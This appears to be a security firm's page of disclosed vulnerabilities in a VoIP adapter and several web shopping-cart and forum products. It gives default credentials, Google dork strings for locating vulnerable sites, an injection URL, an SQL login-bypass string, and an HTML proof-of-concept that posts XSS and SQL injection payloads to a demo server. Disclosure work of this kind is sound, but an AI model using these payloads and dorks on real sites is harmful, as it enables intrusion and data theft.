While RedLevel focuses heavily on providing on-demand consultation for our partners in business, we also conduct independent research and evaluations on consumer information technology resources. This security research is then carefully published and documented publicly to BugTraq, a major security mailing list.
|
VONAGE VoIP TELEPHONE ADAPTER DEFAULT MISCONFIGURATION |
|
The Vonage VoIP Telephone Adapter device is, by default, accessible from the WLAN/internet. The product ships with the default username of ‘user’ and default password of ‘user’ to access the administrative backend. Users are suggested to update their passwords immediately. An attacker could cause a denial-of-service by uploading broken firmware to the device or by constantly rebooting the device.
|
|
|
CUBECART v3.0.16 SQL INJECTION VULNERABILITY |
|
An interesting SQL injection vulnerability was discovered in CubeCart v3.0.16. This vulnerability cannot
easily be exploited by traditional means - in fact, the actual vulnerable variable was not found. As a piece of user input is passed to CubeCart, it is sanitized through a routine mySQLSafe - all except
the variable $option in include/cart.inc.php as well as other files in the same directory. The vulnerability was only reproduced by RedLevel with the Acunetix Web Vulnerability Scanner. The
vulnerability evidently 'poisons' data attached with the user's cookie. The following error message
displays an example of the injection:
MySQL Error Occured
1064: You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'Set-Cookie' at
line 2
QUERY = SELECT cc3_CubeCart_options_bot.option_id, cc3_CubeCart_options_bot.value_id,
option_price, option_symbol, assign_id FROM `cc3_CubeCart_options_bot` INNER JOIN
`cc3_CubeCart_options_mid` ON cc3_CubeCart_options_mid.value_id =
cc3_CubeCart_options_bot.value_id INNER JOIN `cc3_CubeCart_options_top` ON
cc3_CubeCart_options_bot.option_id = cc3_CubeCart_options_top.option_id WHERE
assign_id = Set-Cookie |
To solve this vulnerability, the variable $option should be sanitized with mySQLSafe in all include files. |
|
|
UBB.threads (<= v6.1.1) SQL INJECTION VULNERABILITY |
|
The $_GET variable 'C' in UBB.threads (<= v6.1.1) is susceptible to SQL injection.
Vulnerability: http://target.com/ubbthreads.php?Cat=cat&C='
Google d0rk: allintitle:"Forums powered by UBB.threads" |
|
|
SUNSHOP v4 MULTIPLE VULNERABILITIES |
|
After auditing a few shopping cart systems, we stumbled upon a group of related vulnerabilities in Sunshop v4 - cross-site scripting, cookie manipulation, and SQL injection vulnerabilities are prevalent. A proof-of-concept exploit is attached.
<html>
<head><title>SunShop (v4) Multiple Vulnerabilities</title><body>
<center><br><br><font size=4>SunShop (v4) Multiple Vulnerabilities</font><br>
<font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br>
<br>Google d0rk: <a href="http://www.google.com/search?q=+%22Powered+by+SunShop+Shopping+Cart%22">"Powered by SunShop Shopping Cart"</a>
</font><br>
<br><br>
<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="l" size=75 value="<script %0a%0d>alert(1);</script>">
<input name="remove[0]" type="hidden" value="off">
<input name="quantity[0:49]" type="hidden" value="1">
<input name="remove[1]" type="hidden" value="off">
<input name="quantity[1:50]" type="hidden" value="1">
<input name="remove[2]" type="hidden" value="off">
<input name="quantity[2:55]" type="hidden" value="1">
<input name="remove[3]" type="hidden" value="off">
<input name="quantity[3:42]" type="hidden" value="1">
<input name="remove[4]" type="hidden" value="off">
<input name="quantity[4:51]" type="hidden" value="1">
<input name="coupon" type="hidden" value="email@address.com">
<input type=submit value="Execute Attack on variable 'l' in index.php" class="button">
</form>
<br>
<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="c" size=75 value="'">
<input name="pg" type="hidden" value="1">
<input name="l" type="hidden" value="product_list">
<input type=submit value="Execute SQL Injection on variable 'c' in index.php" class="button">
</form>
</body></html> |
|
|
|
SALESCART SHOPPING CART SQL INJECTION VULNERABILITY + PROOF-OF-CONCEPT EXPLOIT |
|
SalesCart does not sanitize any user-input supplied on cgi-bin/reorder2.asp, allowing an attacker to inject arbitrary characters into the SQL query, as well as possible command execution.
Google d0rk: "Sorry, you have no Items in your Shopping Cart !" inurl:cgi-bin/view1.asp
Vulnerable Variable: All forms in reorder2.asp
Vulnerable File: cgi-bin/reorder2.asp (password: x' OR 'x'='x)
Vendor Status: Notified multiple times, no response. Possible silent patch. |
|
|
